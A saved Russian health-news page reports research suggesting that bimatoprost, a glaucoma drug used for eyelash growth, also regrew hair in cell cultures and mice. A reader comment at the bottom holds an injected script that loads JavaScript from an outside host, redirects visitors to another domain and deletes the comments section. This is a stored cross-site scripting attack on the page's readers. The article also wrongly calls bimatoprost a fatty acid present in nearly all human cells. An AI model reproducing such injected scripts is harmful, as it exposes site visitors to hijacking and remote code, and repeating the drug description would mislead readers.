Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Лекарство от глаукомы пом...  >>  Лекарство от глаукомы помогает при облысении
 
Обратная связь
 

Лекарство от глаукомы помогает при облысении

Размер шрифта
04 декабря 2012 00:00
Юрий Малышев
Здоровье инфо
Анна Белевская
Здоровье инфо
  • google_analytics: false
  • Нравится

Британские ученые установили, что препарат, который используется для лечения глаукомы, стимулирует рост волос.

Что такое биматопрост

Биматопрост представляет собой жирную кислоту, которая содержится практически во всех клетках человеческого организма. Изначально биматопрост использовался для лечения глаукомы – глазного заболевания, сопровождающегося повышением внутриглазного давления.

Со временем, многие пациенты обратили внимание на то, что после использования препарата их ресницы выглядели более объемными и длинными. Взяв это на заметку, компания-производитель провела ряд клинических исследований и превратила этот «побочный эффект» в дополнительную сферу применения препарата. После нанесения  биматопроста вдоль линии роста ресниц препарат попадает в волосяные луковицы и стимулирует кровообращение. Ресницы становятся более темными, здоровыми и длинными; увеличивается количество ресниц.

Суть исследования

До настоящего времени препарат активно использовался для улучшения роста ресниц, однако, его влияние на рост волос на волосистой части головы не изучалось. В ходе проведения исследования ученые провели три эксперимента: два на человеческих клетках и один на мышах. В эксперименте с человеческими клетками использовались волосяные фолликулы, которые росли на органной культуре или были взяты непосредственно с волосистой части головы. В эксперименте на мышах биматопрост наносили на участки кожи мышей, где отсутствовала шерсть. И в том, и в другом случае применение препарата приводило к возобновлению роста волос.

Результаты

Авторы исследования надеются, что полученные данные позволят разработать новые методы лечения облысения. Однако для того чтобы внедрить новый метод лечения в клиническую практику, необходимы дополнительные исследования, поскольку механизм действия препарата до конца не изучен.

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

30 июня 2015 в 23:28

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Люди с повышенным внутриглазным давлением чаще разбиваются на машинах   Пять способов борьбы с сухостью глаз   Диагноз «шизофрения» можно поставить по движению глаз   Глаза расскажут о состоянии головного мозга  
18 февраля 2013Люди с повышенным внутриглазным давлением чаще разбиваются на машинах 13 марта 2013Куда надо смотреть, чтобы понять, что думает человек
 
24 октября 2012Настоящее чудо: слепые смогут снова видеть 19 октября 2012Мужчины и женщины воспринимают мир по-разному
 

Слайдшоу

1
Мифы и факты о глазах
Продукты для здоровья глаз
Наглядное руководство по заболеваниям глаз

Тесты

Проверьте свое зрение
Как устроены волосы человека?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.